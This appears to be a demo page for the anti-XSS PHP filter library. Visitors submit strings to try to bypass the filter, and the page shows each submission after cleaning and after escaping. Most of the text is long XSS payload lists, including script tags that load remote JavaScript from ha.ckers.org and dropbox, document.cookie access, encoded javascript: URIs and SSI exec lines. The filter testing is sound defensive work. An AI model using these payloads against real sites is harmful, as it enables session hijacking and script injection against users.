Anti-XSS for PHP

{ @hacker | "try to bypass this XSS filter" }

github.com/voku/anti-xss



If you need some inspiration for new attacks, take a look at the PHPUnit tests. I have already included test from e.g. "DOMPurify", "JS-XSS" and "LaravelSecurity". Here you can find some more XSS strings:



PS: This demo, is also available at github.com and you can also create pull-requests, here.


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<SCRIPT>alert('XSS');</SCRIPT>

keyword(s):

description:

by fddfdf | at 2020-12-03 00:17:12


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<SCRIPT>alert('XSS');</SCRIPT>

keyword(s):

description:

by fsdf | at 2020-11-26 20:23:39


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

dfgf

result with twig: {{ xss.xss | escape }}:

dfgf

keyword(s):

description:

by gdf | at 2020-11-26 20:23:05


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<SCRIPT>alert('XSS');</SCRIPT>

keyword(s): DASDAS

description:

by DASDSA | at 2020-11-24 22:43:15


result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<INPUT TYPE="IMAGE" SRC="alert((515)S');"> <BODY BACKGROUND="alert((516)S')"> <STYLE>li {list-style-image: url("alert((519)S')");}</STYLE><UL>
  • XSS
    <BODY > <BGSOUND SRC="alert((521)S');">
    <LINK REL="stylesheet" HREF="alert((523)S');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert((501)S")';</STYLE> > & TYPE="text/javascript" > <STYLE type="text/css">BODY{background:url("alert((527)S')")}</STYLE> <STYLE type="text/css">BODY{background:url("alert((528)S')")}</STYLE> <META HTTP-EQUIV="refresh" CONTENT="0;url=alert((530)S');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=alert((531)S');"> <IFRAME SRC="alert((532)S');"></IFRAME> <IFRAME SRC=# ></IFRAME> <FRAMESET><FRAME SRC="alert((533)S');"></FRAMESET>
    <BASE HREF="alert((539)S');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> '"--> <? echo('alert((503)S") Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID="> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD> " SRC="http://ha.ckers.org/xss.js"> " '' SRC="http://ha.ckers.org/xss.js">" SRC="http://ha.ckers.org/xss.js">XSS XSS XSS XSS XSS XSS <iframe src=" prompt(438) " > <svg><style>{font-family:'<iframe/>' <input/ <sVg><isindex <img src='https://dl.dropbox.com/u/13018058/js.js'>"> <meta content=" 1 ; alert(447)" http-equiv="refresh"/> <svg> <iframe src=javascript:alert(document.location)> <form><a href="">X <>< src=""> X ="> & > '> < href="">X <style/> <///style///><span %2F >SPAN <style>{-o-link-source:'<body/>' <blink/ > {Firefox & Opera} ^__^
    X
    {IE7} <iframe/ / src=javaSCRIPT:alert(457) //<form/action=javascript:alert(document.cookie)><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/ /*iframe/src*/> //|\\ //|\\ /<svg><style>{src:'<style/>'</font>/</style> <a/href=""><input type="X"> </plaintext\></|\><plaintext/ </svg>''<svg>alert(1) {Opera} <a href=""><button> <div >DIV</div> <iframe > <a href="">X</a>

    result with twig: {{ xss.xss | escape }}:

    <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert((513)S')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert((514)S');// </TITLE><SCRIPT>alert((499)S");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert((515)S');"> <BODY BACKGROUND="javascript:alert((516)S')"> <IMG DYNSRC="javascript:alert((517)S')"> <IMG LOWSRC="javascript:alert((518)S')"> <STYLE>li {list-style-image: url("javascript:alert((519)S')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox((500)S")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert((520)S')> <BGSOUND SRC="javascript:alert((521)S');"> <BR SIZE="&{alert((522)S')}"> <LINK REL="stylesheet" HREF="javascript:alert((523)S');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert((501)S")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert((524)S'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert((502)S"))'> <STYLE TYPE="text/javascript">alert((525)S');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert((526)S')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert((527)S')")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert((528)S')")}</STYLE> <XSS STYLE="xss:expression(alert((529)S'))"> <XSS STYLE="behavior: url(xss.htc);"> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert((530)S');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert((531)S');"> <IFRAME SRC="javascript:alert((532)S');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert((533)S');"></FRAMESET> <TABLE BACKGROUND="javascript:alert((534)S')"> <TABLE><TD BACKGROUND="javascript:alert((535)S')"> <DIV STYLE="background-image: url(javascript:alert((536)S'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert((537)S'))"> <DIV STYLE="width: expression(alert((538)S'));"> <BASE HREF="javascript:alert((539)S');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert((503)S")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert((540)S')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert((541)S');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <iframe %00 src="&Tab;javascript:prompt(438)&Tab;"%00> <svg><style>{font-family&colon;'<iframe/onload=confirm(439)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt %00>alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(440) <form><isindex formaction="javascript&colon;confirm(441)" <img src=`%00`&NewLine; onerror=alert(442)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(443)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(444)/*%00*/</script /*%00*/ &#34;&#62;<h1/onmouseover='\u0061lert(445)'>%00 <iframe/src="data:text/html,<svg &#111;&#110;load=alert(446)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(447)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(448)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert&#x28;1&#x29;">X </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> <img/&#09;&#10;&#11; src=`~` onerror=prompt(449)> <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(450)"&#11;&#10;&#09;;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a http://www.google<script .com>alert(document.location)</script <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a <img/src=@&#32;&#13; onerror = prompt('&#49;') <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( &#00;</form><input type&#61;"date" onfocus="alert(451)"> <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(452)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(453) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(454)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(455)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ <div/style="width:expression(confirm(456))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(457) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(458) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(459)>'</font>/</style> <a/href="javascript:&#13; javascript:prompt(460)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(461) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(462)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:10:39


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    <INPUT TYPE="IMAGE" SRC="alert((515)S');"> <BODY BACKGROUND="alert((516)S')"> <STYLE>li {list-style-image: url("alert((519)S')");}</STYLE><UL>
  • XSS
    <BODY > <BGSOUND SRC="alert((521)S');">
    <LINK REL="stylesheet" HREF="alert((523)S');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert((501)S")';</STYLE> > & TYPE="text/javascript" > <STYLE type="text/css">BODY{background:url("alert((527)S')")}</STYLE> <STYLE type="text/css">BODY{background:url("alert((528)S')")}</STYLE> <META HTTP-EQUIV="refresh" CONTENT="0;url=alert((530)S');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=alert((531)S');"> <IFRAME SRC="alert((532)S');"></IFRAME> <IFRAME SRC=# ></IFRAME> <FRAMESET><FRAME SRC="alert((533)S');"></FRAMESET>
    <BASE HREF="alert((539)S');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> '"--> <? echo('alert((503)S") Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID="> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD> " SRC="http://ha.ckers.org/xss.js"> " '' SRC="http://ha.ckers.org/xss.js">" SRC="http://ha.ckers.org/xss.js">XSS XSS XSS XSS XSS XSS <iframe src=" prompt(438) " > <svg><style>{font-family:'<iframe/>' <input/ <sVg><isindex <img src='https://dl.dropbox.com/u/13018058/js.js'></object> <iframe src="data:text/html,"></iframe> Click Me

    result with twig: {{ xss.xss | escape }}:

    <SCRIPT SRC=http://ha.ckers.org/xss.js?< B > <SCRIPT SRC=//ha.ckers.org/.j> <IMG SRC="javascript:alert((513)S')" <iframe src=http://ha.ckers.org/scriptlet.html < \";alert((514)S');// </TITLE><SCRIPT>alert((499)S");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert((515)S');"> <BODY BACKGROUND="javascript:alert((516)S')"> <IMG DYNSRC="javascript:alert((517)S')"> <IMG LOWSRC="javascript:alert((518)S')"> <STYLE>li {list-style-image: url("javascript:alert((519)S')");}</STYLE><UL><LI>XSS</br> <IMG SRC='vbscript:msgbox((500)S")'> <IMG SRC="livescript:[code]"> <BODY ONLOAD=alert((520)S')> <BGSOUND SRC="javascript:alert((521)S');"> <BR SIZE="&{alert((522)S')}"> <LINK REL="stylesheet" HREF="javascript:alert((523)S');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert((501)S")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert((524)S'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert((502)S"))'> <STYLE TYPE="text/javascript">alert((525)S');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert((526)S')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert((527)S')")}</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert((528)S')")}</STYLE> <XSS STYLE="xss:expression(alert((529)S'))"> <XSS STYLE="behavior: url(xss.htc);"> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert((530)S');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert((531)S');"> <IFRAME SRC="javascript:alert((532)S');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert((533)S');"></FRAMESET> <TABLE BACKGROUND="javascript:alert((534)S')"> <TABLE><TD BACKGROUND="javascript:alert((535)S')"> <DIV STYLE="background-image: url(javascript:alert((536)S'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert((537)S'))"> <DIV STYLE="width: expression(alert((538)S'));"> <BASE HREF="javascript:alert((539)S');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)';echo('IPT>alert((503)S")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert((540)S')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert((541)S');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <iframe %00 src="&Tab;javascript:prompt(438)&Tab;"%00> <svg><style>{font-family&colon;'<iframe/onload=confirm(439)>' <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" <sVg><scRipt %00>alert&lpar;1&rpar; {Opera} <img/src=`%00` onerror=this.onerror=confirm(440) <form><isindex formaction="javascript&colon;confirm(441)" <img src=`%00`&NewLine; onerror=alert(442)&NewLine; <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> <ScRipT 5-0*3+9/3=>prompt(443)</ScRipT giveanswerhere=? <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /*%00*/>/*%00*/alert(444)/*%00*/</script /*%00*/ &#34;&#62;<h1/onmouseover='\u0061lert(445)'>%00 <iframe/src="data:text/html,<svg &#111;&#110;load=alert(446)>"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(447)" http-equiv="refresh"/> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} <meta http-equiv="refresh" content="0;url=javascript:confirm(448)"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> <form><a href="javascript:\u0061lert&#x28;1&#x29;">X </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> <img/&#09;&#10;&#11; src=`~` onerror=prompt(449)> <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(450)"&#11;&#10;&#09;;> <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a http://www.google<script .com>alert(document.location)</script <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a <img/src=@&#32;&#13; onerror = prompt('&#49;') <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; <script ^__^>alert(String.fromCharCode(49))</script ^__^ </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( &#00;</form><input type&#61;"date" onfocus="alert(451)"> <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(452)&NewLine;>X</a> <script ~~~>alert(0%0)</script ~~~> <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(453) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(454)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(455)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ <div/style="width:expression(confirm(456))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(457) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(458) /*iframe/src*/> //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(459)>'</font>/</style> <a/href="javascript:&#13; javascript:prompt(460)"><input type="X"> </plaintext\></|\><plaintext/onmouseover=prompt(461) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(462)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(463)">On Mouse Over</var> <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> <img src="/" =_=" title="onerror='prompt(464)'"> <%<!--'%><script>alert(465);</script --> <script src="data:text/javascript,alert(466)"></script> <iframe/src \/\/onload = prompt(467) <iframe/onreadystatechange=alert(468) <svg/onload=alert(469) <input value=<><iframe/src=javascript:confirm(470) <input type="text" value=`` <div/onmouseover='alert(471)'>X</div> http://www.<script>alert(472)</script .com <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> <svg><script ?>alert(473) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> <img src=`xx:xx`onerror=alert(474)> <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> <meta http-equiv="refresh" content="0;javascript&colon;alert(475)"/> <math><a xlink:href="//jsfiddle.net/t846h/">click <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg 